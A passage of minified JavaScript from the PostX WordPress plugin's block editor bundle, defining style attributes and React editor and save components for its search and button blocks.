.ultp-search-canvas"}]},canvasWidth:{type:"object",default:{lg:"600",xs:"100",ulg:"px",unit:"%"},style:[{depends:[{key:"popupAnimation",condition:"==",value:"popup"}],selector:"{{ULTP}} .ultp-search-canvas { width: {{canvasWidth}};}"},{depends:[{key:"popupAnimation",condition:"!=",value:"popup"}],selector:"{{ULTP}} .ultp-search-canvas > div { max-width: {{canvasWidth}} !important; width: 100% !important; }"}]},popupPadding:{type:"object",default:{lg:{top:"40",bottom:"40",left:"40",right:"40",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-search-canvas { padding: {{popupPadding}}; }"}]},popupRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-search-canvas { border-radius: {{popupRadius}}; }"}]},popupShadow:{type:"object",default:{openShadow:1,width:{top:0,right:3,bottom:6,left:0},color:"rgba(0, 0, 0, 0.16)"},style:[{depends:[{key:"searchPopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-canvas"}]},popupPositionX:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"popupAnimation",condition:"==",value:"popup"},{key:"searchPopupPosition",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-search-popup .ultp-search-canvas {right:{{popupPositionX}}; left: auto; } \n                body > {{ULTP}} { transform: translateX(-{{popupPositionX}}) }"},{depends:[{key:"popupAnimation",condition:"==",value:"popup"},{key:"searchPopupPosition",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-search-popup .ultp-search-canvas {  left:{{popupPositionX}}; right: auto; } \n                body > {{ULTP}}   { transform: translateX({{popupPositionX}}) }"}]},popupPositionY:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"popupAnimation",condition:"==",value:"popup"}],selector:"{{ULTP}} .ultp-search-popup .ultp-search-canvas { top:{{popupPositionY}}; } \n                body > {{ULTP}}.result-data.ultp-search-animation-popup { translate: 0px {{popupPositionY}} }"}]},searchBtnReverse:{type:"boolean",default:!1,style:[{depends:[{key:"searchFormStyle",condition:"==",value:"input1"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-searchform-content.ultp-searchform-input1 { flex-direction: row-reverse; } \n                {{ULTP}} .ultp-searchres-input {  padding-left: 16px; padding-right: 40px; }"},{depends:[{key:"searchFormStyle",condition:"==",value:"input2"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button { right: auto; } \n                {{ULTP}} .ultp-search-clear { right: 16px;  } \n                {{ULTP}} .ultp-searchres-input {  padding-left: 120px;  padding-right: 40px;}"},{depends:[{key:"searchFormStyle",condition:"==",value:"input3"},{key:"searchBtnReverse",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-button {  right: auto; left: 0px;} \n                {{ULTP}} .ultp-search-clear { right: 16px } \n                {{ULTP}} .ultp-searchres-input {  padding-left: 120px; padding-right: 40px;}"},{depends:[{key:"searchBtnReverse",condition:"==",value:!1}]}]},searchInputPlaceholder:{type:"string",default:"Search..."},inputTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input"}]},searchFormWidth:{type:"object",default:{lg:"",sm:"100",unit:"%"},style:[{depends:[{key:"searchPopup",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-searchform-content, \n                {{ULTP}} .ultp-search-result { width: {{searchFormWidth}} !important; }"}]},inputHeight:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}}  input.ultp-searchres-input { height: {{inputHeight}}; }"}]},inputColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input { color: {{inputColor}}; }"}]},inputBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} input.ultp-searchres-input"}]},inputFocusBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#000"},style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input:focus"}]},inputBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#989898"},style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input"}]},inputPadding:{type:"object",default:{lg:{}},style:[{selector:"{{ULTP}} .ultp-search-inputwrap input.ultp-searchres-input { padding:{{inputPadding}}; }"}]},inputRadius:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} input.ultp-searchres-input { border-radius:{{inputRadius}}; }"}]},resColumn:{type:"object",default:{lg:"1"},style:[{selector:"{{ULTP}} .ultp-result-data { display: grid; grid-template-columns: repeat( {{resColumn}} , auto) } "}]},resultGap:{type:"object",default:{lg:"10"},style:[{depends:[{key:"resultSeparatorEnable",condition:"!=",value:!0},{key:"moreResultsbtn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-result-data { gap:{{resultGap}}px; } "},{depends:[{key:"resMoreResultDevider",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-result-data { gap:{{resultGap}}px; } "},{depends:[{key:"moreResultsbtn",condition:"==",value:!1},{key:"resultSeparatorEnable",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-result-data { gap:{{resultGap}}px; } "}]},resExcerptEnable:{type:"boolean",default:!0},resCatEnable:{type:"boolean",default:!0},resAuthEnable:{type:"boolean",default:!0},resDateEnable:{type:"boolean",default:!0},resImageEnable:{type:"boolean",default:!0},resImageSize:{type:"object",default:{lg:"70",unit:"px"},style:[{depends:[{key:"resImageEnable",condition:"==",value:!0}],selector:"{{ULTP}}  img.ultp-searchresult-image { height:{{resImageSize}}; width:{{resImageSize}}; } "}]},resImageRadius:{type:"object",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},style:[{depends:[{key:"resImageEnable",condition:"==",value:!0}],selector:"{{ULTP}} img.ultp-searchresult-image { border-radius: {{resImageRadius}}; }"}]},resImageSpace:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"resImageEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { column-gap:{{resImageSpace}}; } "}]},resTitleColor:{type:"string",default:"#101010",style:[{selector:"{{ULTP}} .ultp-search-result .ultp-searchresult-title { color:{{resTitleColor}}; }"}]},resExcerptColor:{type:"string",default:"#000",style:[{depends:[{key:"resExcerptEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-searchresult-excerpt { color:{{resExcerptColor}}; }"}]},resMetaColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}}  .ultp-searchresult-author, \n                {{ULTP}}  .ultp-searchresult-publishdate, \n                {{ULTP}} .ultp-searchresult-category a { color:{{resMetaColor}}; }"}]},resTitleHoverColor:{type:"string",default:"#037fff",style:[{selector:"{{ULTP}} .ultp-search-result .ultp-searchresult-title:hover { color:{{resTitleHoverColor}}; }"}]},resMetaHoverColor:{type:"string",default:"#037fff",style:[{selector:"{{ULTP}} .ultp-searchresult-author:hover, \n                {{ULTP}} .ultp-searchresult-publishdate:hover, \n                {{ULTP}} .ultp-searchresult-category a:hover { color:{{resMetaHoverColor}}; }"}]},resTitleTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:23,unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-search-result  a.ultp-searchresult-title"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:300},style:[{depends:[{key:"resExcerptEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-searchresult-excerpt"}]},resMetaTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:300},style:[{selector:"{{ULTP}} .ultp-search-result .ultp-searchresult-author, \n                {{ULTP}} .ultp-search-result .ultp-searchresult-publishdate, \n                {{ULTP}}  .ultp-searchresult-category a"}]},resExcerptLimit:{type:"string",default:"25",style:[{depends:[{key:"resExcerptEnable",condition:"==",value:!0}]}]},resultMetaSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} .ultp-rescontent-meta > div::after, \n                {{ULTP}} .ultp-rescontent-meta > .ultp-searchresult-author:after { margin: 0px {{resultMetaSpace}} }"}]},resultMetaSeparatorSize:{type:"object",default:{lg:"5",unit:"px"},style:[{selector:"{{ULTP}} .ultp-rescontent-meta > div::after, \n                {{ULTP}} .ultp-rescontent-meta > .ultp-searchresult-author:after { height:{{resultMetaSeparatorSize}}; width:{{resultMetaSeparatorSize}}; }"}]},resMetaSeparatorColor:{type:"string",default:"#4A4A4A",style:[{selector:"{{ULTP}} .ultp-rescontent-meta > div::after, \n                {{ULTP}} .ultp-rescontent-meta > .ultp-searchresult-author:after { background-color:{{resMetaSeparatorColor}}; }"}]},resultHighlighter:{type:"boolean",default:!0,style:[{depends:[{key:"resultHighlighter",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-highlight { font-weight: bold; text-decoration: underline } "},{depends:[{key:"resultHighlighter",condition:"==",value:!1}]}]},resultHighlighterColor:{type:"string",default:"#777777",style:[{depends:[{key:"resultHighlighter",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-highlight { color: {{resultHighlighterColor}}; }"}]},resultBg:{type:"object",default:{openColor:1,type:"color",color:"#FCFCFC"},style:[{selector:"{{ULTP}} .ultp-search-result"}]},resultMaxHeight:{type:"object",default:{lg:"300",unit:"px"},style:[{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"popupAnimation",condition:"==",value:"fullwidth"}],selector:"{{ULTP}} .ultp-search-result {  max-height:{{resultMaxHeight}} !important; }  \n                {{ULTP}} .ultp-search-canvas:has(.ultp-search-clear.active) .ultp-search-result { min-height:{{resultMaxHeight}} !important; }"},{depends:[{key:"searchPopup",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-result { max-height:{{resultMaxHeight}}; }  \n                {{ULTP}} .ultp-result-data { max-height:calc({{resultMaxHeight}} - 50px); }"},{depends:[{key:"searchPopup",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result { max-height:{{resultMaxHeight}}; } \n                {{ULTP}} .ultp-result-data { max-height:calc({{resultMaxHeight}} - 50px); }"}]},resultPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"15",right:"15",unit:"px"}},style:[{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-dropdown .ultp-result-data.ultp-result-show, \n                {{ULTP}}.popup-active .ultp-result-data.ultp-result-show { padding:{{resultPadding}}; } \n                {{ULTP}} .ultp-search-result .ultp-result-data:has( > div) { padding:{{resultPadding}}; }  \n                {{ULTP}} .ultp-search-noresult { padding: {{resultPadding}} !important;}"},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-result__item { padding:{{resultPadding}};} "},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!1},{key:"resMoreResultDevider",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-result__item { padding:{{resultPadding}}; } "},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!1},{key:"moreResultsbtn",condition:"==",value:!1},{key:"resMoreResultDevider",condition:"==",value:!1}],selector:"{{ULTP}}.popup-active .ultp-result-data.ultp-result-show, \n                {{ULTP}} .ultp-search-noresult { padding: {{resultPadding}} !important;} \n                {{ULTP}} .ultp-result-data:has( > div) { padding:{{resultPadding}}; }"},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!1},{key:"resMoreResultDevider",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { padding:{{resultPadding}}; } "},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!1},{key:"moreResultsbtn",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!1}],selector:"{{ULTP}}.popup-active .ultp-result-data.ultp-result-show,  \n                {{ULTP}} .ultp-search-noresult { padding: {{resultPadding}} !important;} \n                {{ULTP}} .ultp-result-data:has( > div) { padding:{{resultPadding}}; }"},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!1},{key:"moreResultsbtn",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!0}],selector:"{{ULTP}}.popup-active .ultp-result-data.ultp-result-show,  \n                {{ULTP}} .ultp-search-noresult {  padding: {{resultPadding}} !important;} \n                {{ULTP}} .ultp-result-data:has( > div) { padding:{{resultPadding}}; }"},{depends:[{key:"resultSeparatorEnable",condition:"==",value:!1},{key:"moreResultsbtn",condition:"==",value:!1},{key:"resMoreResultDevider",condition:"==",value:!0}],selector:"{{ULTP}}.popup-active .ultp-result-data.ultp-result-show,  \n                {{ULTP}} .ultp-search-noresult { color: green; padding: {{resultPadding}} !important;} \n                {{ULTP}} .ultp-result-data:has( > div) { padding:{{resultPadding}}; color: red; }"}]},resultBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .ultp-search-result"}]},resultBorderRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-search-result { border-radius: {{resultBorderRadius}}; }"}]},resultShadow:{type:"object",default:{openShadow:0,width:{top:0,right:3,bottom:6,left:0},color:"rgba(0, 0, 0, 0.16)"},style:[{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"popupAnimation",condition:"==",value:"popup"}],selector:"{{ULTP}} .ultp-search-canvas:has(.ultp-search-clear.active) .ultp-search-result"},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"popupAnimation",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-search-result:has(.ultp-result-data > div)"},{depends:[{key:"searchPopup",condition:"==",value:!0},{key:"popupAnimation",condition:"==",value:"fullwidth"}],selector:"{{ULTP}} .ultp-search-canvas:has(.ultp-search-clear.active) .ultp-search-result"},{depends:[{key:"searchPopup",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-search-result:has(.active), \n                {{ULTP}} .ultp-search-result:has( .ultp-result-data > .ultp-search-result__item )"}]},resultSpacingX:{type:"object",default:{lg:"0",unit:"px"},style:[{depends:[{key:"searchPopup",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-search-result { left:{{resultSpacingX}}; }"}]},resultSpacingY:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-search-result { top:{{resultSpacingY}}; }"}]},resultSeparatorEnable:{type:"boolean",default:!0},resultSeparatorColor:{type:"string",default:"#DEDEDE",style:[{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { border-color: {{resultSeparatorColor}} !important; }"}]},resultSeparatorWidth:{type:"object",default:{lg:"1",unit:"px"},style:[{depends:[{key:"moreResultsbtn",condition:"==",value:!0},{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-viewall-results { border-top: {{resultSeparatorWidth}} solid !important; }"},{depends:[{key:"moreResultsbtn",condition:"==",value:!0},{key:"resMoreResultDevider",condition:"!=",value:!0},{key:"resultSeparatorEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { border-top: {{resultSeparatorWidth}} solid; } \n                {{ULTP}} .ultp-search-result__item { margin-top: -{{resultSeparatorWidth}}; }"},{depends:[{key:"moreResultsbtn",condition:"!=",value:!0},{key:"resultSeparatorEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-search-result__item { border-top: {{resultSeparatorWidth}} solid; } \n                {{ULTP}} .ultp-search-result__item { margin-top: -{{resultSeparatorWidth}}; }"}]},resMoreResultDevider:{type:"boolean",default:!0,style:[{depends:[{key:"resultSeparatorEnable",condition:"==",value:!0},{key:"moreResultsbtn",condition:"==",value:!0}]}]},moreResultsbtn:{type:"boolean",default:!0},viewMoreResultText:{type:"string",default:"View More Results"},moreResultPosts:{type:"string",default:3,style:[{depends:[{key:"moreResultsbtn",condition:"==",value:!0}]}]},moreResultsText:{type:"string",default:"View More Results"},moreResultsTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:23,unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-viewall-results"}]},moreResultsColor:{type:"string",default:"#646464",style:[{selector:"{{ULTP}} .ultp-viewall-results { color:{{moreResultsColor}}; }"}]},moreResultsHoverColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-viewall-results:hover { color:{{moreResultsHoverColor}}; }"}]},loadingColor:{type:"string",default:"#000",style:[{selector:"{{ULTP}} .ultp-result-loader.active:before, \n            {{ULTP}} .ultp-viewmore-loader.viewmore-active { border-color: {{loadingColor}} {{loadingColor}}  {{loadingColor}} transparent !important; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper { z-index:{{advanceZindex}};}"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},15816:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(52021),n=l(85258),r=l(12728);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/search-block/","block_docs");s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/advanced-search.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Ensure effortless content searching.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/search.svg"}},edit:i.Z,save:()=>null})},77750:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(15242);const{__}=wp.i18n,{InspectorControls:s,InnerBlocks:p,useBlockProps:c}=wp.blockEditor,{useEffect:u,useState:d,Fragment:m}=wp.element,{getBlockAttributes:g,getBlockRootClientId:y}=wp.data.select("core/block-editor");function b(e){const[t,l]=d("Content"),{setAttributes:b,name:v,attributes:h,className:f,clientId:k,attributes:{blockId:w,currentPostId:x,advanceId:T,btnAnimation:_,previewImg:C}}=e;u((()=>{const e=k.substr(0,6),t=g(y(k));(0,a.qi)(b,t,x,k),w?w&&w!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||b({blockId:e})):b({blockId:e})}),[k]);const E={setAttributes:b,name:v,attributes:h,setSection:l,section:t,clientId:k};let S;if(w&&(S=(0,i.Kh)(h,"ultimate-post/button-group",w,(0,a.k0)())),C)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:C});const P=c({...T&&{id:T},className:`ultp-block-${w} ${f}`});return(0,o.createElement)(m,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Z,{store:E})),(0,o.createElement)(n.Z,{include:[{type:"template"}],store:E}),(0,o.createElement)("div",P,S&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:S}}),(0,o.createElement)("div",{className:"ultp-button-wrapper"+(_?" ultp-anim-"+_:"")},(0,o.createElement)(p,{template:[["ultimate-post/button",{}]],allowedBlocks:["ultimate-post/button"]}))))}},63133:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294);const{Component:a}=wp.element,{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,btnAnimation:a}=e.attributes,r=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("div",r,(0,o.createElement)("div",{className:`ultp-button-wrapper ultp-button-frontend ultp-anim-${a}`},(0,o.createElement)(i.Content,null)))}},15242:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e})=>{const{btnAnimation:t,btnVeticalPosition:l}=e.attributes;let r="";switch(t){case"style1":case"style2":r="Control The Background From Button Background";break;case"style3":case"style4":r="Control The Box-shadow From Button Background"}let s=["juststart","justcenter","justend","justbetween","justaround","justevenly"];return l&&(s=["juststart","justcenter","justend"]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid7952",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"global",title:__("Global Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"range",key:"btnItemSpace",min:0,max:300,step:1,responsive:!0,label:__("Button Gap","ultimate-post")}},{position:2,data:{type:"alignment",key:"btnJustifyAlignment",icons:s,options:["flex-start","center","flex-end","space-between","space-around","space-evenly"],label:__("Horizontal Alignment","ultimate-post")}},{position:3,data:{type:"alignment",block:"button",key:"btnVeticalAlignment",disableJustify:!0,icons:["algnStart","algnCenter","algnEnd","stretch"],options:["flex-start","center","flex-end","stretch"],label:__("Vertical Alignment","ultimate-post")}},{position:4,data:{type:"toggle",key:"btnVeticalPosition",label:__("Vertical Alignment","ultimate-post")}},{position:5,data:{type:"dimension",key:"btnWrapMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Button Animation","ultimate-post"),include:[{position:1,data:{type:"select",key:"btnAnimation",label:__("Button Aniation","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"style1",label:__("Style 1","ultimate-post")},{value:"style2",label:__("Style 2","ultimate-post")},{value:"style3",label:__("Style 3","ultimate-post")},{value:"style4",label:__("Style 4","ultimate-post")}],help:r}},{position:2,data:{type:"range",key:"btnTranslate",min:-20,max:20,step:.5,responsive:!0,label:__("Button Transform","ultimate-post"),unit:["px"],help:"Control Button Position"}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("z-index","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}},88309:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},btnJustifyAlignment:{type:"string",default:"",style:[{depends:[{key:"btnVeticalPosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { justify-content: {{btnJustifyAlignment}}; }"},{depends:[{key:"btnVeticalPosition",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { align-items: {{btnJustifyAlignment}}; }"}]},btnVeticalAlignment:{type:"string",default:"",style:[{depends:[{key:"btnVeticalPosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { align-items: {{btnVeticalAlignment}}; }\n                {{ULTP}} .ultp-button-wrapper .wp-block-ultimate-post-button { height: 100%; }"}]},btnVeticalPosition:{type:"boolean",default:!1,style:[{depends:[{key:"btnVeticalPosition",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { flex-direction: column; }"},{depends:[{key:"btnVeticalPosition",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n                {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { flex-direction: row; }"}]},btnItemSpace:{type:"object",default:{lg:"28",unit:"px"},style:[{selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { gap:{{btnItemSpace}};  }"}]},btnWrapMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-button-wrapper .block-editor-inner-blocks .block-editor-block-list__layout,\n            {{ULTP}} .ultp-button-wrapper.ultp-button-frontend { margin:{{btnWrapMargin}};  }"}]},btnAnimation:{type:"string",default:"none",style:[{depends:[{key:"btnAnimation",condition:"!=",value:"style3"}]},{depends:[{key:"btnAnimation",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-button-wrapper.ultp-anim-style3 .wp-block-ultimate-post-button:hover { box-shadow: none; }"}]},btnTranslate:{type:"object",default:{lg:"-5",unit:"px"},style:[{depends:[{key:"btnAnimation",condition:"==",value:"style4"}],selector:"{{ULTP}} .wp-block-ultimate-post-button:hover { transform: translate( {{btnTranslate}}, {{btnTranslate}});  }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-button-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},31400:(e,t,l)=>{"use strict";l.d(t,{Z:()=>h});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(64766),s=l(52441);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{useState:u,useEffect:d,Fragment:m}=wp.element,{createBlock:g}=wp.blocks,{RichText:y}=wp.blockEditor,{getBlockAttributes:b,getBlockRootClientId:v}=wp.data.select("core/block-editor");function h(e){const[t,l]=u("Content"),{setAttributes:h,name:f,className:k,attributes:w,clientId:x,attributes:{blockId:T,advanceId:_,layout:C,btnIconEnable:E,btntextEnable:S,btnText:P,btnIcon:L,btnLink:I,dcEnabled:B}}=e;d((()=>{const e=x.substr(0,6),t=b(v(x));T?T&&T!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||h({blockId:e})):h({blockId:e})}),[x]);const U={setAttributes:h,name:f,attributes:w,setSection:l,section:t,clientId:x};let M;T&&(M=(0,i.Kh)(w,"ultimate-post/button",T,(0,a.k0)()));const A=c({..._&&{id:_},className:`ultp-block-${T} ultp-button-${C}`});return(0,o.createElement)(m,null,(0,o.createElement)(p,null,(0,o.createElement)(s.Z,{store:U})),(0,o.createElement)(n.Z,{include:[{type:"layout",block:"button",key:"layout",label:__("Style","ultimate-post"),options:[{img:"assets/img/layouts/button/layout1.svg",label:__("Layout 1","ultimate-post"),value:"layout1"},{img:"assets/img/layouts/button/layout2.svg",label:__("Layout 2","ultimate-post"),value:"layout2"},{img:"assets/img/layouts/button/layout3.svg",label:__("Layout 3","ultimate-post"),value:"layout3"},{img:"assets/img/layouts/button/layout4.svg",label:__("Layout 4","ultimate-post"),value:"layout4"}]},{type:"linkbutton",key:"btnLink",onlyLink:!0,value:I,placeholder:"Enter Button URL",label:__("Button Link","ultimate-post")}],store:U}),(0,o.createElement)("div",A,M&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:M}}),E&&(0,o.createElement)("div",{className:"ultp-btnIcon-wrap"},r.ZP[L]),S&&(0,o.createElement)(y,{key:"editable",tagName:"div",className:"ultp-button-text",allowedFormats:["ultimate-post/dynamic-content"],placeholder:__("Click Here…","ultimate-post"),onChange:e=>h({btnText:e}),onReplace:(e,t,l)=>wp.data.dispatch("core/block-editor").replaceBlocks(x,e,t,l),onSplit:(e,t)=>g("ultimate-post/button",{...w,btnText:e}),value:P})))}},55790:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294),i=l(69735);const{useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,layout:r,btnIconEnable:s,btntextEnable:p,btnText:c,btnIcon:u,btnLink:d,btnLinkTarget:m,btnLinkDownload:g,btnLinkNoFollow:y,btnLinkSponsored:b,dcEnabled:v}=e.attributes;let h="noopener";h+=y?" nofollow":"",h+=b?" sponsored":"";const f={};(0,i.o6)()&&v?(f.href="#",f.target=m):d.url&&(f.href=d.url,f.target=m);const k=n.save({...l&&{id:l},className:`ultp-block-${t} ultp-button-${r}`});return(0,a.createElement)("a",(0,o.Z)({},k,f,{rel:h,download:g?"download":void 